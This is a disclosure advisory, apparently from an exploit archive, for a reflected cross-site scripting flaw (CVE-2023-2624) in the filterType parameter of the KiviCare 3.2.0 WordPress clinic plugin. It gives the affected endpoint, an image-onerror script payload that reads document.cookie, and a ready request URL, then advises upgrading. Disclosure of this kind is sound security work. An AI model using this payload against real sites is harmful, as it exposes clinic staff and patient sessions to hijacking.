WordPress KiviCare 3.2.0 Cross Site Scripting

2023.10.05

Credit: Arvandy

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2023-2624

CWE: CWE-79

# Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting
# Date: 03-10-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/
# Vendor Homepage: https://kivicare.io/
# Version: 3.2.0
# Tested on: Windows, Linux
# CVE: CVE-2023-2624
# Product Description
KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/
# Vulnerability overview:
The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.
# Proof of Concept:
Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=
Affected Parameters: filterType
XSS Payload: <img src=x onerror=alert(document.cookie)>
http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
# Recommendation
Upgrade to version 3.2.1

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress KiviCare 3.2.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.